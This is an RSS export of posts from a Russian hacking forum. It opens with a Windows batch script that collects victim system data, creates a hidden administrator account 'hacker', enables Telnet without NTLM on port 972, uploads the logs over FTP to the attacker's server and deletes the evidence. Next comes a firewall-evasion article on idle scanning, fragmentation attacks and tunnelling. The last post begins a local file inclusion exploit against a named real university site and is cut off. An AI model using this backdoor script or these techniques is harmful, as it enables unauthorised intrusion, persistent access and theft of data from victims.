						&lt;p&gt;Тело скрипта:&lt;br /&gt;net user &amp;gt; c:windowsuser.log //Собирает инфу о Юзверях&lt;br /&gt;ipconfig /all &amp;gt; c:windowsipconf.log //Собирает и запихивает в файл инфу про IP&lt;br /&gt;route print &amp;gt; c:windowsroute.log //Собирает и запихивает в файл инфу о сетевых маршрутах&lt;br /&gt;net share &amp;gt; c:windowsshare.log // Инфа о ресурсах&lt;br /&gt;ver &amp;gt; c:windowsver.log //Ну и самое главное, версия и сборка винды)))&lt;br /&gt;chcp 1251 //Кусок кода дальше я позаимствовал в статье &amp;quot;Взлом через Telnet&amp;quot; или как-то так...&lt;br /&gt;net user SUPPORT_388945a0 /delete&lt;br /&gt;net user hacker hack /add&lt;br /&gt;net localgroup Администраторы hacker /add&lt;br /&gt;net localgroup Пользователи SUPPORT_388945a0 /del&lt;br /&gt;sc config tlntsvr start= auto&lt;br /&gt;tlntadmn config port=972 sec=-NTLM&lt;br /&gt;net start Telnet&lt;br /&gt;reg add &amp;quot;HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList&amp;quot; /v hacker /t REG_DWORD /d 00000000&lt;br /&gt;ftp -s:TAR_BZ.TXT //Здесь подрубаемся к FTP и скидываем данные себе на комп (При этом задействуется левый фаил в катором содержется код для FTP)&lt;br /&gt;del c:windowsuser.log //Здесь зачищаем следы...&lt;br /&gt;del c:windowsipconf.log&lt;br /&gt;del c:windowsroute.log&lt;br /&gt;del c:windowsshare.log&lt;br /&gt;del c:windowsver.log&lt;br /&gt;exit //Без комментариев&lt;/p&gt;
						&lt;p&gt;Вот тело TAR_BZ.TXT (я незнаю почему йя его так назвал....):&lt;br /&gt;open xxx.xxx.xxx.xxx //Залазим на свой FTP (место xxx.xxx.xxx.xxx ставим IP (желательно свой:)))&lt;br /&gt;login //Здесь пишем логин&lt;br /&gt;pass //Здесь пасс&lt;br /&gt;put c:windowsuser.log //Логи идут к нам... )))&lt;br /&gt;put c:windowsipconf.log&lt;br /&gt;put c:windowsroute.log&lt;br /&gt;put c:windowsshare.log&lt;br /&gt;put c:windowsver.log&lt;br /&gt;bye //Отрубаемся от FTP&lt;/p&gt;
						&lt;p&gt;Работает это (если кто непонял) так, запустив файл, жертва (подставляет сама себя)))) тупо скидывает все данные о инете и открывает Telnet на порте 972. Мы тупо ищем&lt;br /&gt;IP жертвы и лезем на его комп под логином &amp;quot;hacker&amp;quot;, и пассом &amp;quot;hack&amp;quot;. И все, мы на ящике жертвы, и тут полная свобода действий. Можно отключив, допустим Касперыча, кинуть троян и запустить отдаленно.&lt;br /&gt;На этом все. И запомните, я не несу никакой ответственности за ваши действия на чужом компе, ибо йя привел пример....&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:40:48 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=50#p50</guid>
		</item>
		<item>
			<title>Обход брандмауэров снаружи и изнутри</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=49#p49</link>
			<description>&lt;p&gt;Большинство корпоративных сетей ограждено по периметру недемократично настроенными брандмауэрами, защищающими внутренних пользователей от самих себя и отпугивающими начинающих хакеров. Между тем, для опытного взломщика даже качественный и грамотно настроенный брандмауэр – не преграда.&lt;/p&gt;
						&lt;p&gt;Брандмауэр (он же фаервол) в общем случае представляет собой совокупность систем, обеспечивающих надлежащий уровень разграничения доступа, достигаемый путем управления проходящим трафиком по более или менее гибкому набору критериев (правил поведения). Короче говоря, брандмауэр пропускает только ту часть трафика, которая явно разрешена администратором и блокирует все остальное.&lt;/p&gt;
						&lt;p&gt;На рынке доминируют два типа брандмауэров – пакетные фильтры, также называемые шлюзами фильтрации пакетов (packet filter gateway), и программные прокси (application proxy). Примером первого типа является Firewall от компании Check Point, а второго – Microsoft Proxy Server.&lt;/p&gt;
						&lt;p&gt;Пакетные фильтры полностью прозрачны для пользователей и весьма производительны, однако недостаточно надежны. Фактически они представляют собой разновидность маршрутизаторов, принимающих пакеты как извне, так и изнутри сети, и решающих, как с ними поступить – пропустить дальше или уничтожить, при необходимости уведомив отправителя, что его пакет сдох. Большинство брандмауэров этого типа работает на IP-уровне, причем полнота поддержки IP-протокола и качество фильтрации оставляют желать лучшего, поэтому атакующий может легко их обмануть. На домашних компьютерах такие брандмауэры еще имеют смысл, но при наличии даже плохенького маршрутизатора они лишь удорожают систему, ничего не давая взамен, так как те же самые правила фильтрации пакетов можно задать и на маршрутизаторе!&lt;/p&gt;
						&lt;p&gt;Программные прокси представляют собой обычные прокси-сервера, прослушивающие заданные порты (например, 25, 110, 80) и поддерживающие взаимодействие с заранее оговоренным перечнем сетевых сервисов. В отличие от фильтров, передающих IP-пакеты &amp;quot;как есть&amp;quot;, прокси самостоятельно собирают TCP-пакеты, выкусывают из них пользовательские данные, наклеивают на них новый заголовок и вновь разбирают полученный пакет на IP, при необходимости осуществляя трансляцию адресов. Если брандмауэр не содержит ошибок, обмануть его на сетевом уровне уже не удастся; к тому же, он скрывает от атакующего структуру внутренней сети – снаружи остается лишь брандмауэр. А для достижения наивысшей защищенности администратор может организовать на брандмауэре дополнительные процедуры авторизации и аутентификации, «набрасывающиеся» на противника еще на дальних рубежах обороны. Это были достоинства. Что же касается недостатков, то программные прокси ограничивают пользователей в выборе приложений. Они работают намного медленнее пакетных фильтров и здорово снижают производительность (особенно на быстрых каналах). &lt;/p&gt;
						&lt;p&gt;Брандмауэры обоих типов обычно включают в себя более или менее урезанную версию системы определения вторжений (Intruder Detection System, IDS), анализирующую характер сетевых запросов и выявляющую потенциально опасные действия - обращение к несуществующим портам (характерно для сканирования), пакеты с TTL, равным единице, (характерно для трассировки) и т.д. Все это существенно затрудняет атаку, и хакеру приходится действовать очень осторожно, поскольку любой неверный шаг тут же выдаст его с поторохами. Однако интеллектуальность интегрированных систем распознавания достаточна невелика, и большинство уважающих себя администраторов перекладывает эту задачу на плечи специализированных пакетов, таких, как Real Secure от Internet Security System.&lt;/p&gt;
						&lt;p&gt;В зависимости от конфигурации сети брандмауэр может быть установлен на выделенный компьютер или может делить системные ресурсы с кем-нибудь еще. Персональные брандмауэры, широко распространенные в мире Windows, в подавляющем большинстве случаев устанавливаются непосредственно на сам защищаемый компьютер. Если этот пакетный фильтр реализован без ошибок, то защищенность системы ничуть не страдает и атаковать ее так же сложно, как и на выделенном брандмауэре. Локальные программные прокси защищают компьютер лишь от некоторых типов атак (например, блокируют засылку троянов через IE), оставляя систему полностью открытой. В UNIX-like-системах пакетный фильтр присутствует изначально, а в штатный комплект поставки входит большое количество разнообразных прокси-серверов, поэтому приобретать дополнительное программное обеспечение не нужно.&lt;br /&gt;От чего защищает и от чего не защищает брандмауэр&lt;/p&gt;
						&lt;p&gt;Пакетные фильтры в общем случае позволяют закрывать все входящие/исходящие TCP-порты, полностью или частично блокировать некоторые протоколы (например, ICMP), препятствовать установке соединений с данными IP-адресами и т.д. Правильно сконфигурированная сеть должна состоять, по меньшей мере, из двух зон: внутренней корпоративной сети (corporative network), огражденной брандмауэром и населенной рабочими станциями, сетевыми принтерами, intranet-серверами, серверами баз данных и прочими ресурсами подобного типа; а также демилитаризованной зоны (demilitarized zone, или, сокращенно, DMZ), в которой расположены публичные сервера, доступные из интернета. Брандмауэр, настроенный на наиболее драконический уровень защищенности, должен:&lt;br /&gt;закрывать все порты, кроме тех, что принадлежат публичным сетевым службам (HTTP, FTP, SMTP и т.д.);&lt;br /&gt;пакеты, приходящие на заданный порт, отправлять тем и только тем узлам, на которых установлены соответствующие службы (например, если WWW-сервер расположен на узле А, а FTP-сервер на узле B, то пакет, направленный на 80 порт узла B, должен блокироваться брандмауэром);&lt;br /&gt;блокировать входящие соединения из внешней сети, направленные в корпоративную сеть (правда, в этом случае пользователи сети не смогут работать с внешними FTP-серверами в активном режиме);&lt;br /&gt;блокировать исходящие соединения из DMZ-зоны, направленные во внутреннюю сеть (исключая FTP- и DNS-сервера, которым исходящие соединения необходимы);&lt;br /&gt;блокировать входящие соединения из DMZ-зоны, направленные во внутреннюю сеть (если этого не сделать, то атакующий, захвативший управление одним из публичных серверов, беспрепятственно проникнет и в корпоративную сеть).&lt;br /&gt;блокировать входящие соединения в DMZ-зону из внешней сети по служебным протоколам, часто использующимся для атаки (например, ICMP; правда, полное блокирование ICMP создает большие проблемы, в частности, перестает работать ping и становится невозможным автоматическое определение наиболее предпочтительного MTU);&lt;br /&gt;блокировать входящие/исходящие соединения с портами и/или IP-адресами внешней сети, заданными администратором.&lt;/p&gt;
						&lt;p&gt;Фактически роль брандмауэра сводится к ограждению корпоративной сети от всяких любопытствующих, блуждающих по просторам инета. Тем не менее, прочность этого ограждения только кажущаяся. Если клиент корпоративной сети использует уязвимую версию браузера или клиента электронной почты (а большая часть программного обеспечения уязвима!), атакующему достаточно заманить его на троянизированную WEB-страничку или послать ему письмо с вирусом внутри, и через короткое время локальная сеть окажется поражена. Даже если исходящие соединения из корпоративной сети запрещены, shell-код сможет воспользоваться уже установленным TCP-соединением, через которое он был заброшен на атакованный узел, передавая хакеру управление удаленной системой.&lt;/p&gt;
						&lt;p&gt;Брандмауэр может и сам являться объектом атаки, ведь он, как и всякая сложная программа, не обходится без дыр и уязвимостей. Дыры в брандмауэрах обнаруживаются практически каждый год и далеко не сразу затыкаются (особенно если брандмауэр реализован на &amp;quot;железном&amp;quot; уровне). Забавно, но плохой брандмауэр не только не увеличивает, но даже ухудшает защищенность системы (в первую очередь это относится к персональным брандмауэрам, популярность которых в последнее время необычайно высока).&lt;br /&gt;Обнаружение и идентификация брандмауэра&lt;/p&gt;
						&lt;p&gt;Залогом успешной атаки является своевременное обнаружение и идентификация брандмауэра (или, в общем случае, IDS, но в контексте настоящей статьи мы будем исходить из того, что она совмещена с брандмауэром).&lt;/p&gt;
						&lt;p&gt;Большинство брандмауэров отбрасывают пакеты с истечением TTL (Time To Live – время жизни), блокируя тем самым трассировку маршрута, чем разоблачают себя. Аналогичным образом поступают и некоторые маршрутизаторы, однако, как уже говорилось выше, между маршрутизатором и пакетным фильтром нет принципиальной разницы.&lt;/p&gt;
						&lt;p&gt;Отслеживание маршрута обычно осуществляется утилитой traceroute, поддерживающей трассировку через протоколы ICMP и UDP, причем ICMP блокируется гораздо чаще. Выбрав узел, заведомо защищенный брандмауэром (например, wwwintel.ru), попробуем отследить к нему маршрут командой traceroute –I wwww.intel.ru.&lt;/p&gt;
						&lt;p&gt;$traceroute –I wwww.intel.ru&lt;/p&gt;
						&lt;p&gt;Трассировка маршрута к bouncer.glb.intel.com [198.175.98.50]&lt;/p&gt;
						&lt;p&gt;с максимальным числом прыжков 30:&lt;/p&gt;
						&lt;p&gt;1 1352 ms 150 ms 150 ms 62.183.0.180&lt;/p&gt;
						&lt;p&gt;2 140 ms 150 ms 140 ms 62.183.0.220&lt;/p&gt;
						&lt;p&gt;3 140 ms 140 ms 130 ms 217.106.16.52&lt;/p&gt;
						&lt;p&gt;4 200 ms 190 ms 191 ms aksai-bbn0-po2-2.rt-comm.ru [217.106.7.25]&lt;/p&gt;
						&lt;p&gt;5 190 ms 211 ms 210 ms msk-bbn0-po1-3.rt-comm.ru [217.106.7.93]&lt;/p&gt;
						&lt;p&gt;6 200 ms 190 ms 210 ms spb-bbn0-po8-1.rt-comm.ru [217.106.6.230]&lt;/p&gt;
						&lt;p&gt;7 190 ms 180 ms 201 ms stockholm-bgw0-po0-3-0-0.rt-comm.ru [217.106.7.30]&lt;/p&gt;
						&lt;p&gt;8 180 ms 191 ms 190 ms POS4-0.GW7.STK3.ALTER.NET [146.188.68.149]&lt;/p&gt;
						&lt;p&gt;9 190 ms 191 ms 190 ms 146.188.5.33&lt;/p&gt;
						&lt;p&gt;10 190 ms 190 ms 200 ms 146.188.11.230&lt;/p&gt;
						&lt;p&gt;11 311 ms 310 ms 311 ms 146.188.5.197&lt;/p&gt;
						&lt;p&gt;12 291 ms 310 ms 301 ms so-0-0-0.IL1.DCA6.ALTER.NET [146.188.13.33]&lt;/p&gt;
						&lt;p&gt;13 381 ms 370 ms 371 ms 152.63.1.137&lt;/p&gt;
						&lt;p&gt;14 371 ms 450 ms 451 ms 152.63.107.150&lt;/p&gt;
						&lt;p&gt;15 381 ms 451 ms 450 ms 152.63.107.105&lt;/p&gt;
						&lt;p&gt;16 370 ms 461 ms 451 ms 152.63.106.33&lt;/p&gt;
						&lt;p&gt;17 361 ms 380 ms 371 ms 157.130.180.186&lt;/p&gt;
						&lt;p&gt;18 370 ms 381 ms 441 ms 192.198.138.68&lt;/p&gt;
						&lt;p&gt;19 * * * Превышен интервал ожидания для запроса.&lt;/p&gt;
						&lt;p&gt;20 * * * Превышен интервал ожидания для запроса.&lt;/p&gt;
						&lt;p&gt;Смотри: трассировка доходит до узла 192.198.138.68, а затем умирает, что указывает либо на брандмауэр, либо на недемократичный маршрутизатор. Чуть позже мы покажем, как можно проникнуть сквозь него, а пока выберем для трассировки другой узел, например, wwwzenon.ru&lt;/p&gt;
						&lt;p&gt;$traceroute –I wwwzenon.ru&lt;/p&gt;
						&lt;p&gt;Трассировка маршрута к distributed.zenon.net [195.2.91.103]&lt;/p&gt;
						&lt;p&gt;с максимальным числом прыжков 30:&lt;/p&gt;
						&lt;p&gt;1 2444 ms 1632 ms 1642 ms 62.183.0.180&lt;/p&gt;
						&lt;p&gt;2 1923 ms 1632 ms 1823 ms 62.183.0.220&lt;/p&gt;
						&lt;p&gt;3 1632 ms 1603 ms 1852 ms 217.106.16.52&lt;/p&gt;
						&lt;p&gt;4 1693 ms 1532 ms 1302 ms aksai-bbn0-po2-2.rt-comm.ru [217.106.7.25]&lt;/p&gt;
						&lt;p&gt;5 1642 ms 1603 ms 1642 ms 217.106.7.93&lt;/p&gt;
						&lt;p&gt;6 1562 ms 1853 ms 1762 ms msk-bgw1-ge0-3-0-0.rt-comm.ru [217.106.7.194]&lt;/p&gt;
						&lt;p&gt;7 1462 ms 411 ms 180 ms mow-b1-pos1-2.telia.net [213.248.99.89]&lt;/p&gt;
						&lt;p&gt;8 170 ms 180 ms 160 ms mow-b2-geth2-0.telia.net [213.248.101.18]&lt;/p&gt;
						&lt;p&gt;9 160 ms 160 ms 170 ms 213.248.78.178&lt;/p&gt;
						&lt;p&gt;10 160 ms 151 ms 180 ms 62.113.112.67&lt;/p&gt;
						&lt;p&gt;11 181 ms 160 ms 170 ms css-rus2.zenon.net [195.2.91.103]&lt;/p&gt;
						&lt;p&gt;Трассировка завершена.&lt;/p&gt;
						&lt;p&gt;На этот раз трассировка проходит нормально. Выходит, что никакого брандмауэра вокруг zenon&#039;а нет? Очень может быть, но для уверенного ответа нам требуется дополнительная информация. Узел 195.2.91.193 принадлежит сети класса С (три старших бита IP-адреса равны 110), и, если эта сеть не защищена брандмауэром, большинство ее узлов должно откликаться на ping, что в данном случае и происходит. Сканирование выявляет 65 открытых адресов. Следовательно, либо маршрутизатора здесь нет, либо он беспрепятственно пропускает наш ping.&lt;/p&gt;
						&lt;p&gt;При желании можно попробовать просканировать порты, однако, во-первых, наличие открытых портов еще ни о чем не говорит (быть может, брандмауэр блокирует лишь один порт, но самый нужный, например, защищает дырявый RPC от посягательств извне), а, во-вторых, при сканировании хакеру будет трудно остаться незамеченным. С другой стороны, порты сканируют все кому не лень, и администраторы уже давно не обращают на это внимания.&lt;/p&gt;
						&lt;p&gt;Утилита nmap позволяет обнаруживать некоторые из брандмауэров, устанавливая статут порта во &amp;quot;firewalled&amp;quot;. Такое происходит всякий раз, когда в ответ на SYN удаленный узел возвращает ICMP-пакет типа 3 с кодом 13 (Admin Prohibited Filter) с действительным IP-адресом брандмауэра в заголовке (nmap его не отображает; пиши собственный сканер или, используя любой снифер, самостоятельно проанализируй возвращаемый пакет). Если возвратится SYN/ACK – сканируемый порт отрыт. RST/ACK указывает на закрытый или заблокированный брандмауэром порт. Не все брандмауэры генерируют RST/ACK при попытке подключения к заблокированным портам (Check Point Firewall – генерирует), некоторые отсылают ICMP-сообщение, как было показано выше, или ничего не посылают вообще.&lt;/p&gt;
						&lt;p&gt;Большинство брандмауэров поддерживает удаленное управление через интернет, открывая один или несколько TCP-портов, уникальных для каждого брандмауэра. Так, например, Check Point Firewall открывает 256, 257 и 258 порты, а Microsoft Proxy – 1080. Некоторые брандмауэры явным образом сообщают свое имя и версию программного продукта при подключении к ним по netcat (или telnet), в особенности этим грешат прокси-сервера. Последовательно опрашивая все узлы, расположенные впереди исследуемого хоста, на предмет прослушивания характерных для брандмауэров портов, мы в большинстве случаев сможет не только выявить их присутствие, но и определить IP-адрес! Разумеется, эти порты могут быть закрыты как на самом брандмауэре (правда, не все брандмауэры это позволяют), так и на предшествующем ему маршрутизаторе (но тогда брандмауэром будет нельзя управлять через интернет).&lt;br /&gt;Сканирование и трассировка через брандмауэр&lt;/p&gt;
						&lt;p&gt;Прямая трассировка через брандмауэр чаще всего оказывается невозможной (какому администратору приятно раскрывать интимные подробности топологии своих сетей), и атакующему приходится прибегать к всевозможным ухищрениям.&lt;/p&gt;
						&lt;p&gt;Утилита Firewalk представляет собой классический трассер, посылающий TCP- или UDP-пакеты, с таким расчетом, чтобы на узле, следующем непосредственно за брандмауэром, их TTL обращался в ноль, заставляя систему генерировать сообщение ICMP_TIME_EXCEEDED. Благодаря этому Firewalk уверенно работает даже там, где штатные средства уже не справляются, хотя крепко защищенный брандмауэр ей, конечно, не пробить и атакующему приходится использовать более продвинутые алгоритмы.&lt;/p&gt;
						&lt;p&gt;Будем исходить из того, что с каждым отправляемым IP-пакетом система увеличивает его ID на единицу (как это чаще всего и случается). С другой стороны, согласно спецификации RFC-793, описывающей TCP-протокол, всякий хост, получивший посторонний пакет, который не относится к установленным TCP-соединениям, должен реагировать на него посылкой RST. Для реализации атаки нам понадобится удаленный узел, не обрабатывающий в данный момент никакого постороннего трафика и генерирующий предсказуемую последовательность ID. В хакерских кругах такой узел называется немым (dump). Обнаружить немой хост очень просто – достаточно лишь отправить ему серию IP-пакетов и проанализировать ID, возвращенный в заголовках. Запомним (запишем на бумажку) ID последнего пакета. Затем выберем жертву и отправим ей SYN-пакет, указав в обратном адресе IP немого узла. Атакуемый узел, думая, что немой хост хочет установить с ним TCP-соединение, ответит: SYN/ACK. Немой хост, словив посторонний SYN/ACK, возвратит RST, увеличивая свой счетчик ID на единицу. Отправив немому хосту еще один IP-пакет и проанализировав возвращенный ID, мы сможем узнать, посылал ли немой хост жертве RST-пакет или нет. Если посылал, значит, атакуемый хост активен и подтверждает установку TCP-соединения на заданный порт. При желании хакер может просканировать все интересующие его порты, не рискуя оказаться замеченным, ведь вычислить его IP практически невозможно – сканирование осуществляется &amp;quot;руками&amp;quot; немого узла и с точки зрения атакуемого выглядит как обычное SYN-сканирование.&lt;/p&gt;
						&lt;p&gt;Предположим, что немой хост расположен внутри DMZ, а жертва находится внутри корпоративной сети. Тогда, отправив немому хосту SYN-пакет от имени жертвы, мы сможем проникнуть через брандмауэр, поскольку он будет думать, что с ним устанавливает соединение внутренний хост, а соединения этого типа в 99,9% случаях разрешены (если их запретить, пользователи корпоративной сети не смогут работать со своим же собственными публичными серверами). Естественно, все маршрутизаторы на пути от хакера к немому хосту не должны блокировать пакет с поддельным обратным адресом, в противном случае пакет умрет задолго до того, как доберется до места назначения.&lt;/p&gt;
						&lt;p&gt;Утилита hping как раз и реализует сценарий сканирования данного типа, что делает ее основным орудием злоумышленника для исследования корпоративных сетей, огражденных брандмауэром.&lt;/p&gt;
						&lt;p&gt;Как вариант, хакер может захватить один из узлов, расположенных внутри DMZ, используя их как плацдарм для дальнейших атак.&lt;br /&gt;Проникновение через брандмауэр&lt;/p&gt;
						&lt;p&gt;Сборку фрагментированных TCP-пакетов поддерживают только самые качественные из брандмауэров, а все остальные анализируют лишь первый фрагмент, беспрепятственно пропуская все остальные. Послав сильно фрагментированный TCP-пакет, &amp;quot;размазывающий&amp;quot; TCP-заголовок по нескольким IP-пакетам, хакер скроет от брандмауэра Acknowledgment Number и он не сможет определить принадлежность TCP-пакета к соответствующей ему TCP-сессии (быть может, он относится к легальному соединению, установленному корпоративным пользователем). Если только на брандмауэре не активирована опция &amp;quot;резать фрагментированные пакеты&amp;quot;, успех хакерской операции гарантирован. Блокирование фрагментированных пакетов создает множество проблем и препятствует нормальной работе сети. Теоретически возможно блокировать лишь пакеты с фрагментированным TCP-заголовком, однако далеко не всякий брандмауэр поддерживает столь гибкую политику настройки. Атаки данного типа, называемые Tiny Fragment Attack, обладают чрезвычайно мощной проникающей способностью и потому являются излюбленным приемом всех хакеров.&lt;/p&gt;
						&lt;p&gt;Атаки с использованием внутренней маршрутизации (она же маршрутизация от источника, или source routing) намного менее актуальны, но мы все же их рассмотрим. Как известно, IP-протокол позволяет включать в пакет информацию о маршрутизации. При отправке IP-пакета жертве навязанная хакером маршрутизация чаще всего игнорируется, и траектория перемещения пакета определяется исключительно промежуточными маршрутизаторами, но ответные пакеты возвращаются по маршруту, обратному указанному в IP-заголовке, что создает благоприятные условия для его подмены. Более упрощенный вариант атаки ограничивается одной лишь подменой IP-адреса отправителя. Грамотно настроенные маршрутизаторы (и большинство клонов UNIX) блокируют пакеты с внутренней маршрутизацией. Пакеты с поддельными IP-адресами представляют несколько большую проблему, однако качественный брандмауэр позволяет отсеивать и их.&lt;/p&gt;
						&lt;p&gt;Таблицы маршрутизации могут быть динамически изменены посылкой сообщения ICMP Redirect, что позволяет (по крайней мере, теоретически) направить хакерский трафик в обход брандмауэра (см. также ARP- spoofing), впрочем, сейчас такие безнадежно инсекьюрные системы практически уже не встречаются.&lt;br /&gt;Побег из-за брандмауэра&lt;/p&gt;
						&lt;p&gt;Пользователи внутренней сети, огражденной недемократичным брандмауэром, серьезно ограничены в своих возможностях. Про невозможность работы с FTP-серверами в активном режиме мы уже говорили. Также могут быть запрещены некоторые протоколы и закрыты необходимые тебе порты. В клинических случаях администраторы ведут черных списки IP-адресов, блокируя доступ к сайтам &amp;quot;нецелесообразной&amp;quot; тематики.&lt;/p&gt;
						&lt;p&gt;Поскольку брандмауэры рассчитаны на защиту извне, а не изнутри, вырваться из-за их застенков очень просто, достаточно лишь воспользоваться любым подходящим прокси-сервером, находящимся во внешней сети и еще не занесенным администратором в черный список. В частности, популярный клиент ICQ позволяет обмениваться сообщениями не напрямую, а через сервер (не обязательно сервер компании-разработчика). Существуют тысячи серверов, поддерживающих работу ICQ. Одни существуют в более или менее неизменном виде уже несколько лет, другие динамически то появляются, то исчезают. И если &amp;quot;долгожителей&amp;quot; еще реально занести в стоп-лист, то уследить за серверами-однодневками администратор просто не в состоянии!&lt;/p&gt;
						&lt;p&gt;Также можно воспользоваться протоколом SSH (Secure Shell), изначально спроектированным для работы через брандмауэр и поддерживающим шифрование трафика (на тот случай, если брандмауэр вздумает искать в нем &amp;quot;запрещенные&amp;quot; слова типа &amp;quot;sex&amp;quot;, &amp;quot;hack&amp;quot; и т.д.). SSH-протокол может работать по любому доступному порту, например, 80, и тогда с точки зрения брандмауэра все будет выглядеть как легальная работа с WEB-сервером. Между тем, SSH является лишь фундаментом для остальных протоколов, из которых в первую очередь хотелось бы отметить telnet, обеспечивающий взаимодействие с удаленными терминалами. Заплатив порядка 20$ за хостинг любому провайдеру, ты получишь аккаунт, поддерживающий SSH и позволяющий устанавливать соединения с другими узлами сети (бесплатные хостинги этой возможности чаще всего лишены или накладывают на нее жесткие ограничения).&lt;/p&gt;
						&lt;p&gt;Наконец, можно воспользоваться сотовой телефонией, прямым модемным подключением и прочими коммуникационными средствами, устанавливающими соединение с провайдером, в обход брандмауэра.&lt;br /&gt;Заключение&lt;/p&gt;
						&lt;p&gt;Технологии построения брандмауэров не стоят на месте, и специалисты по информационной безопасности не дремлют. С каждым днем хакерствовать становится все труднее и труднее, однако полностью хакерство не исчезнет никогда. Ведь на смену заткнутым дырам приходят другие. Главное, не сидеть сложа руки, а творчески экспериментировать с брандмауэрами, изучать стандарты и спецификации, изучать дизассемблерные листинги и искать, искать, искать…&lt;/p&gt;
						&lt;p&gt;Ссылки по теме&lt;br /&gt;Nmap&lt;/p&gt;
						&lt;p&gt;Популярный сканер портов, позволяющий обнаруживать некоторые типы брандмауэров. Бесплатен. Исходные тексты доступны. На сайте &lt;a href=&quot;http://www.insecure.org/nmap&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.insecure.org/nmap&lt;/a&gt; море технической информации по проблеме.&lt;br /&gt;FireWalk&lt;/p&gt;
						&lt;p&gt;Утилита для трассировки сети через брандмауэр, работающая на TCP/UDP-протоколах и основанная на TTL. Бесплатна. &lt;a href=&quot;http://www.packetfactory.net/firewalk.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.packetfactory.net/firewalk.&lt;/a&gt; Перед использованием рекомендуется ознакомиться с документацией &lt;a href=&quot;http://www.packetfactory.net/firewalk/firewalk-final.pdf.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.packetfactory.net/firewalk/f &amp;#8230; final.pdf.&lt;/a&gt;&lt;br /&gt;HPING&lt;/p&gt;
						&lt;p&gt;Утилита, реализующая сканирование через немой хост. Мощное оружие для исследования внутренней сети по-за брандмауэром. Бесплатна и хорошо документирована. &lt;a href=&quot;http://www.hping.org/papers.html.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.hping.org/papers.html.&lt;/a&gt;&lt;br /&gt;SSH-клиент&lt;/p&gt;
						&lt;p&gt;Secure Shell клиент, используемый пользователями внутренней сети для преодоления запретов и ограничений, наложенных брандмауэром. Бесплатен. Распространяется вместе с исходными текстами. &lt;a href=&quot;http://www.openssh.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.openssh.com&lt;/a&gt;.&lt;br /&gt;FFAQ&lt;/p&gt;
						&lt;p&gt;Подробный FAQ по брандмауэрам на английском языке. wwwinterhack.net/pubs/fwfaq/firewalls-faq.pdf. Его русский перевод, не отличающейся особой свежестью, лежит на ln.com.ua/~openxs/articles/fwfaq.html.&lt;br /&gt;Firewalls&lt;/p&gt;
						&lt;p&gt;Конспект лекций по брандмауэрам (на английском языке) от тайваньского профессора Yeali S. Sun. &lt;a href=&quot;http://www.im.ntu.edu.tw/~sunny/pdf/IS/Firewall.pdf&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.im.ntu.edu.tw/~sunny/pdf/IS/Firewall.pdf&lt;/a&gt;&lt;br /&gt;OpenNet&lt;/p&gt;
						&lt;p&gt;Огромный портал по сетевой безопасности, содержащий в том числе и информацию о дырах в популярных брандмауэрах (на русском и английском языках). &lt;a href=&quot;http://www.opennet.ru&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.opennet.ru&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Брандмауэры подвержены большому количеству DoS-атак, таких, как эхо-шторм или SYN-flood, которым они в принципе неспособны противостоять.&lt;/p&gt;
						&lt;p&gt;Брандмауэр – это маршрутизатор, проски-север и система обнаружения вторжений в одном флаконе.&lt;/p&gt;
						&lt;p&gt;Брандмауэры не защищают от атак, а лишь ограждают локальную сеть кирпичным забором, через который легко перелезть.&lt;/p&gt;
						&lt;p&gt;В большинстве случаев сквозь кирпичную стену брандмауэра можно пробить ICMP-тоннель, обернув передаваемые данные ICMP-заголовком.&lt;/p&gt;
						&lt;p&gt;Брандмауэр можно атаковать не только извне, но и изнутри корпоративной сети.&lt;/p&gt;
						&lt;p&gt;Различные брандмауэры по-разному реагируют на нестандартные TCP-пакеты, позволяя идентифицировать себя.&lt;/p&gt;
						&lt;p&gt;Брандмауэры, открывающие 53 порт (служба DNS) не только на приемнике (например, Check Point Firewall), но и на источнике, позволяют хакеру просканировать всю внутреннюю сеть.&lt;/p&gt;
						&lt;p&gt;Уязвимость программных прокси в общем случае невелика, и в основном они атакуются через ошибки переполнения буфера.&lt;/p&gt;
						&lt;p&gt;Некоторые брандмауэры подвержены несанкционированному просмотру файлов через порт 8010 и запросы типа &lt;a href=&quot;http://www.host.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.host.com&lt;/a&gt;::8010/c:/ или &lt;a href=&quot;http://www.host.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.host.com&lt;/a&gt;::8010//.&lt;br /&gt;Служба DCOM нуждается в широком диапазоне открытых портов, что существенно снижает степень защищенности системы, обессмысливая использование брандмауэра.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (kravi4)</author>
			<pubDate>Fri, 20 Nov 2009 14:39:49 +0300</pubDate>
			<guid>http://sapog.forumbb.ru/viewtopic.php?pid=49#p49</guid>
		</item>
		<item>
			<title>PHP – Include, и немного удачи.</title>
			<link>http://sapog.forumbb.ru/viewtopic.php?pid=48#p48</link>
			<description>&lt;p&gt;PHP – Include, и немного удачи.&lt;/p&gt;
						&lt;p&gt;Сегодня мы рассмотрим к каким последствиям может привести локальный PHP – Include, скажу сразу в более удачных ситуациях, последствия могут быть еще более плачебны.&lt;/p&gt;
						&lt;p&gt;Собираем Баги.&lt;/p&gt;
						&lt;p&gt;Все началось с найденной на сайте БГУ уязвимости, в другой день и при других обстоятельствах, я, скорее всего не обратил бы на нее внимания, но этому сайту повезло (или не повезло, смотря, как посмотреть).&lt;/p&gt;
						&lt;p&gt;&lt;a href=&quot;http://www.brgu.ru/index.php?openpage=/etc/passwd&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.brgu.ru/index.php?openpage=/etc/passwd&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Итак, мы имеем локальный PHP – Include.&lt;/p&gt;
